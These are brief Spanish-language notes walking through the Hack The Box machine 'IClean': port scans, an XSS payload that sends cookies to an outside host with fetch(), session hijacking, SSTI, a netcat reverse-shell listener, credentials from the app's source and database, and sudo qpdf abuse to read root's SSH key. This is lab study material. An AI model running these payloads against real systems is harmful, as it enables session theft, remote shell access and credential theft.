Iclean
HTB Linux
nmap -A -p- -oA iclean 10.10.11.12 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA iclean 10.10.11.12
echo "10.10.11.12 iclean.htb capiclean.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA iclean-udp 10.10.11.12
ping -c 1 10.10.11.12

nmap -p- --open -T5 -v -n 10.10.11.12
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.12 -oG allPorts

extractPorts allPorts
nmap -sCV -p22,80 10.10.11.12 -oN targeted

bc targeted -l rb


Nos dirigimos a http://capiclean.htb/quote

Ponemos esto en burpsuite y hacemos ctrl+u
img src="imagen.gif" onerror=fetch("http://10.10.14.3:8080/" + document.cookie);>&email=cu3rv0x@test.com

python3 -m http.server 8888

Le damos click izquierdo y Inspect
Agregamos el valor que encontramos en el servidor 8888 y lo ponemos como session y el valor de la session que vemos arriba. y el path seria /

Le damos click a generate


http://capiclean.htb/QRGenerator

Le damos click en Generate

Ponemos el enlace en el formulario

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Abrimos burpsuite y interceptamos la informacion

nc -lvnp 9001
python3 -c 'import pty;pty.spawn("/bin/bash")'
El terminal type es:
xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 187

cat app.py | grep -C3 password

Credenciales-> iclean:pxCsmnGLckUb
mysql -u iclean -p

use capiclean
show tables
select * from users


credenciales-> consuela:simple and clean

sudo /usr/bin/qpdf --empty /tmp/rsa.txt --qdf -add-attachment /root/.ssh/id_rsa --
cat /tmp/rsa.txt

chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.12
cat /root/root.txt
